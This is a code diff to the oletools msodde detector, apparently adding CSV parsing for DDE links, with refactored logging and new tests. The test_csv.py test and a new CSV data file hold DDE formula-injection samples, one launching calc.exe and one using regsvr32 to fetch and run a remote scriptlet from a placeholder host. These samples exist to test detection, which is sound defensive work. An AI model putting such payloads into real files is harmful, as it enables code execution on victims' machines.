  874 +
  875 + if is_small and not results:
  876 + # easy to mis-sniff small files. Try different delimiters
  877 + log.debug('small file, no results; try all delimiters')
  878 + file_handle.seek(0)
  879 + other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
  880 + for delim in other_delim:
  881 + try:
  882 + file_handle.seek(0)
  883 + results, _ = process_csv_dialect(file_handle, delim)
  884 + except csv.Error: # e.g. sniffing fails
  885 + log.debug('failed to csv-parse with delimiter {0!r}'
  886 + .format(delim))
  887 +
  888 + if is_small and not results:
  889 + # try whole file as single cell, since sniffing fails in this case
  890 + log.debug('last attempt: take whole file as single unquoted cell')
  891 + file_handle.seek(0)
  892 + match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
  893 + if match:
  894 + results.append(u' '.join(match.groups()[:2]))
  895 +
  896 + return u'\n'.join(results)
  897 +
  898 +
  899 +def process_csv_dialect(file_handle, delimiters):
  900 + """ helper for process_csv: process with a specific csv dialect """
  901 +
  902 + # determine dialect = delimiter chars, quote chars, ...
  903 + dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH),
  904 + delimiters=delimiters)
  905 + dialect.strict = False # microsoft is never strict
  906 + log.debug('sniffed csv dialect with delimiter {0!r} '
  907 + 'and quote char {1!r}'
  908 + .format(dialect.delimiter, dialect.quotechar))
  909 +
  910 + # rewind file handle to start
  911 + file_handle.seek(0)
  912 +
  913 + # loop over all csv rows and columns
  914 + results = []
  915 + reader = csv.reader(file_handle, dialect)
  916 + for row in reader:
  917 + for cell in row:
  918 + # check if cell matches
  919 + match = CSV_DDE_FORMAT.match(cell)
  920 + if match:
  921 + results.append(u' '.join(match.groups()[:2]))
  922 + return results, dialect
  923 +
  924 +
821 925 def process_file(filepath, field_filter_mode=None):
822   - """ decides which of process_doc/x or process_xls/x to call """
  926 + """ decides which of the process_* functions to call """
823 927 if olefile.isOleFile(filepath):
824   - log.debug('checking streams to see whether this is xls')
  928 + log.debug('Is OLE. Checking streams to see whether this is xls')
825 929 if xls_parser.is_xls(filepath):
  930 + log.debug('Process file as excel 2003 (xls)')
826 931 return process_xls(filepath)
827 932 else:
  933 + log.debug('Process file as word 2003 (doc)')
828 934 return process_doc(filepath)
829 935  
830 936 with open(filepath, 'rb') as file_handle:
831   - if file_handle.read(4) == RTF_START:
832   - # This is a RTF file
  937 + if file_handle.read(4) == RTF_START:
  938 + log.debug('Process file as rtf')
833 939 return process_rtf(file_handle, field_filter_mode)
834 940  
835 941 try:
836 942 doctype = ooxml.get_type(filepath)
837   - except Exception:
838   - log.debug('Exception trying to xml-parse file', exc_info=True)
  943 + log.debug('Detected file type: {0}'.format(doctype))
  944 + except Exception as exc:
  945 + log.debug('Exception trying to xml-parse file: {0}'.format(exc))
839 946 doctype = None
840 947  
841   - if doctype:
842   - log.debug('Detected file type: {0}'.format(doctype))
843 948 if doctype == ooxml.DOCTYPE_EXCEL:
844   - return process_xlsx(filepath, field_filter_mode)
845   - else:
  949 + log.debug('Process file as excel 2007+ (xlsx)')
  950 + return process_xlsx(filepath)
  951 + elif doctype is None:
  952 + log.debug('Process file as csv')
  953 + return process_csv(filepath)
  954 + else: # could be docx; if not: this is the old default code path
  955 + log.debug('Process file as word 2007+ (docx)')
846 956 return process_docx(filepath, field_filter_mode)
847 957  
848 958  
849   -#=== MAIN =================================================================
  959 +# === MAIN =================================================================
850 960  
851 961 def main(cmd_line_args=None):
852 962 """ Main function, called if this file is called as a script
... ... @@ -868,10 +978,10 @@ def main(cmd_line_args=None):
868 978 if args.json and args.loglevel.lower() == 'debug':
869 979 log.warning('Debug log output will not be json-compatible!')
870 980  
871   - if args.nounquote :
  981 + if args.nounquote:
872 982 global NO_QUOTES
873 983 NO_QUOTES = True
874   -
  984 +
875 985 if args.json:
876 986 jout = []
877 987 jout.append(BANNER_JSON)
... ... @@ -890,7 +1000,7 @@ def main(cmd_line_args=None):
890 1000 except Exception as exc:
891 1001 if args.json:
892 1002 jout.append(dict(type='error', error=type(exc).__name__,
893   - message=str(exc))) # strange: str(exc) is enclosed in ""
  1003 + message=str(exc)))
894 1004 else:
895 1005 raise # re-raise last known exception, keeping trace intact
896 1006  
... ...
tests/msodde/test_basic.py
... ... @@ -17,11 +17,13 @@ from traceback import print_exc
17 17  
18 18  
19 19 class TestReturnCode(unittest.TestCase):
  20 + """ check return codes and exception behaviour (not text output) """
20 21  
21 22 def test_valid_doc(self):
22 23 """ check that a valid doc file leads to 0 exit status """
23   - for filename in ('dde-test-from-office2003', 'dde-test-from-office2016',
24   - 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
  24 + for filename in (
  25 + 'dde-test-from-office2003', 'dde-test-from-office2016',
  26 + 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
25 27 self.do_test_validity(join(BASE_DIR, 'msodde',
26 28 filename + '.doc'))
27 29  
... ... @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase):
65 67 except Exception:
66 68 have_exception = True
67 69 print_exc()
68   - except SystemExit as se: # sys.exit() was called
69   - return_code = se.code
70   - if se.code is None:
  70 + except SystemExit as exc: # sys.exit() was called
  71 + return_code = exc.code
  72 + if exc.code is None:
71 73 return_code = 0
72 74  
73 75 self.assertEqual(expect_error, have_exception or (return_code != 0),
... ... @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase):
77 79  
78 80  
79 81 class TestDdeLinks(unittest.TestCase):
  82 + """ capture output of msodde and check dde-links are found correctly """
80 83  
81 84 def get_dde_from_output(self, capturer):
82   - """ helper to read dde links from captured output """
  85 + """ helper to read dde links from captured output
  86 +
  87 + duplicate in tests/msodde/test_csv
  88 + """
83 89 have_start_line = False
84 90 result = []
85 91 for line in capturer:
... ... @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase):
90 96 elif line == 'DDE Links:':
91 97 have_start_line = True
92 98  
93   - self.assertTrue(have_start_line) # ensure output was complete
  99 + self.assertTrue(have_start_line) # ensure output was complete
94 100 return result
95 101  
96 102 def test_with_dde(self):
... ...
tests/msodde/test_blacklist.py
... ... @@ -39,8 +39,8 @@ EXAMPLES_MATCH = (
39 39 r'ADVANCE \x 150',
40 40 r'AUTHOR',
41 41 r'AUTHOR "Tony Caruso"',
42   - r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
43   - r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
  42 + r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
  43 + r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
44 44 r'COMMENTS',
45 45 r'COMMENTS "I came, I saw, I was not impressed."',
46 46 r'CREATEDATE',
... ... @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = (
228 228 r'SKIPIF MERGEFIELD Order < 100',
229 229 )
230 230  
  231 +
231 232 class TestBlacklist(unittest.TestCase):
232 233 """ Tests msodde blacklist feature """
233 234  
... ...
tests/msodde/test_csv.py 0 → 100644
  1 +#!/usr/bin/env python3
  2 +
  3 +
  4 +""" Check various csv examples """
  5 +
  6 +import unittest
  7 +from tempfile import mkstemp
  8 +import os
  9 +from os.path import join
  10 +
  11 +from oletools import msodde
  12 +from tests.test_utils import OutputCapture, DATA_BASE_DIR
  13 +
  14 +
  15 +class TestCSV(unittest.TestCase):
  16 + """ Check various csv examples """
  17 +
  18 + DO_DEBUG = False
  19 +
  20 + def test_texts(self):
  21 + """ write some sample texts to file, run those """
  22 + SAMPLES = (
  23 + "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
  24 + "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
  25 + "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
  26 + "completely innocent text"
  27 + )
  28 +
  29 + LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH
  30 + DELIMITERS = ',\t ;|^'
  31 + QUOTES = '', '"' # no ' since samples use those "internally"
  32 + PREFIXES = ('', '{quote}item-before{quote}{delim}',
  33 + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
  34 + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
  35 + '{quote}item-before{quote}{delim}')
  36 + SUFFIXES = ('', '{delim}{quote}item-after{quote}',
  37 + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
  38 + '{delim}{quote}item-after{quote}' +
  39 + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)
  40 +
  41 + for sample_core in SAMPLES:
  42 + for prefix in PREFIXES:
  43 + for suffix in SUFFIXES:
  44 + for delim in DELIMITERS:
  45 + for quote in QUOTES:
  46 + # without quoting command is split at space or |
  47 + if quote == '' and delim in sample_core:
  48 + continue
  49 +
  50 + sample = \
  51 + prefix.format(quote=quote, delim=delim) + \
  52 + quote + sample_core + quote + \
  53 + suffix.format(quote=quote, delim=delim)
  54 + output = self.write_and_run(sample)
  55 + n_links = len(self.get_dde_from_output(output))
  56 + desc = 'sample with core={0!r}, prefix-len {1}, ' \
  57 + 'suffix-len {2}, delim {3!r} and quote ' \
  58 + '{4!r}'.format(sample_core, len(prefix),
  59 + len(suffix), delim, quote)
  60 + if 'innocent' in sample:
  61 + self.assertEqual(n_links, 0, 'found dde-link '
  62 + 'in clean sample')
  63 + else:
  64 + msg = 'Failed to find dde-link in ' + desc
  65 + self.assertEqual(n_links, 1, msg)
  66 + if self.DO_DEBUG:
  67 + print('Worked: ' + desc)
  68 +
  69 + def test_file(self):
  70 + """ test simple small example file """
  71 + filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
  72 + with OutputCapture() as capturer:
  73 + capturer.reload_module(msodde) # re-create logger
  74 + ret_code = msodde.main([filename, ])
  75 + self.assertEqual(ret_code, 0)
  76 + links = self.get_dde_from_output(capturer)
  77 + self.assertEqual(len(links), 1)
  78 + self.assertEqual(links[0],
  79 + r"cmd '/k \..\..\..\Windows\System32\calc.exe'")
  80 +
  81 + def write_and_run(self, sample_text):
  82 + """ helper for test_texts: save text to file, run through msodde """
  83 + filename = None
  84 + handle = 0
  85 + try:
  86 + handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
  87 + os.write(handle, sample_text.encode('ascii'))
  88 + os.close(handle)
  89 + handle = 0
  90 + args = [filename, ]
  91 + if self.DO_DEBUG:
  92 + args += ['-l', 'debug']
  93 +
  94 + with OutputCapture() as capturer:
  95 + capturer.reload_module(msodde) # re-create logger
  96 + ret_code = msodde.main(args)
  97 + self.assertEqual(ret_code, 0, 'checking sample resulted in '
  98 + 'error:\n' + sample_text)
  99 + return capturer
  100 +
  101 + except Exception:
  102 + raise
  103 + finally:
  104 + if handle:
  105 + os.close(handle)
  106 + handle = 0 # just in case
  107 + if filename:
  108 + if self.DO_DEBUG:
  109 + print('keeping for debug purposes: {0}'.format(filename))
  110 + else:
  111 + os.remove(filename)
  112 + filename = None # just in case
  113 +
  114 + def get_dde_from_output(self, capturer):
  115 + """ helper to read dde links from captured output
  116 +
  117 + duplicate in tests/msodde/test_basic
  118 + """
  119 + have_start_line = False
  120 + result = []
  121 + for line in capturer:
  122 + if self.DO_DEBUG:
  123 + print('captured: ' + line)
  124 + if not line.strip():
  125 + continue # skip empty lines
  126 + if have_start_line:
  127 + result.append(line)
  128 + elif line == 'DDE Links:':
  129 + have_start_line = True
  130 +
  131 + self.assertTrue(have_start_line) # ensure output was complete
  132 + return result
  133 +
  134 +
  135 +# just in case somebody calls this file as a script
  136 +if __name__ == '__main__':
  137 + unittest.main()
... ...
tests/ooxml/test_basic.py
... ... @@ -12,24 +12,33 @@ from oletools import ooxml
12 12 class TestOOXML(unittest.TestCase):
13 13 """ Tests my cool new feature """
14 14  
  15 + DO_DEBUG = False
  16 +
15 17 def test_all_rough(self):
16 18 """Checks all samples, expect either ole files or good ooxml output"""
17 19 acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \
18 20 ooxml.DOCTYPE_POWERPOINT
  21 +
  22 + # files that are neither OLE nor xml:
19 23 except_files = 'empty', 'text'
20   - except_extns = '.xml', '.rtf'
  24 + except_extns = '.xml', '.rtf', '.csv'
  25 +
  26 + # analyse all files in data dir
21 27 for base_dir, _, files in os.walk(DATA_BASE_DIR):
22 28 for filename in files:
23 29 if filename in except_files:
24   - #print('skip file: ' + filename)
  30 + if self.DO_DEBUG:
  31 + print('skip file: ' + filename)
25 32 continue
26 33 if splitext(filename)[1] in except_extns:
27   - #print('skip extn: ' + filename)
  34 + if self.DO_DEBUG:
  35 + print('skip extn: ' + filename)
28 36 continue
29 37  
30 38 full_name = join(base_dir, filename)
31 39 if isOleFile(full_name):
32   - #print('skip ole: ' + filename)
  40 + if self.DO_DEBUG:
  41 + print('skip ole: ' + filename)
33 42 continue
34 43 try:
35 44 doctype = ooxml.get_type(full_name)
... ... @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase):
38 47 self.assertTrue(doctype in acceptable,
39 48 msg='Doctype "{0}" for {1} not acceptable'
40 49 .format(doctype, full_name))
41   - #print('ok: ' + filename + doctype)
  50 + if self.DO_DEBUG:
  51 + print('ok: {0} --> {1}'.format(filename, doctype))
42 52  
43 53  
44 54 # just in case somebody calls this file as a script
... ...
tests/test-data/msodde/dde-in-csv.csv 0 → 100644
  1 +=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0
... ...
tests/test_utils/output_capture.py
... ... @@ -2,13 +2,20 @@
2 2  
3 3 from __future__ import print_function
4 4 import sys
  5 +import logging
5 6  
6 7  
7 8 # python 2/3 version conflict:
8 9 if sys.version_info.major <= 2:
9 10 from StringIO import StringIO
  11 + # reload is a builtin
10 12 else:
11 13 from io import StringIO
  14 + if sys.version_info.minor < 4:
  15 + from imp import reload
  16 + else:
  17 + from importlib import reload
  18 +
12 19  
13 20 class OutputCapture:
14 21 """ context manager that captures stdout
... ... @@ -24,6 +31,10 @@ class OutputCapture:
24 31 # ...or test all output in one go
25 32 some_test(capturer.get_data())
26 33  
  34 + In order to solve issues with old logger instances still remembering closed
  35 + StringIO instances as "their" stdout, logging is shutdown and restarted
  36 + upon entering this Context Manager. This means that you may have to reload
  37 + your module, as well.
27 38 """
28 39  
29 40 def __init__(self):
... ... @@ -32,6 +43,11 @@ class OutputCapture:
32 43 self.data = None
33 44  
34 45 def __enter__(self):
  46 + # Avoid problems with old logger instances that still remember an old
  47 + # closed StringIO as their sys.stdout
  48 + logging.shutdown()
  49 + reload(logging)
  50 +
35 51 # replace sys.stdout with own buffer.
36 52 self.orig_stdout = sys.stdout
37 53 sys.stdout = self.buffer
... ... @@ -61,3 +77,7 @@ class OutputCapture:
61 77 def __iter__(self):
62 78 for line in self.get_data().splitlines():
63 79 yield line
  80 +
  81 + def reload_module(self, mod):
  82 + """ Wrapper around reload function for different python versions """
  83 + return reload(mod)
... ...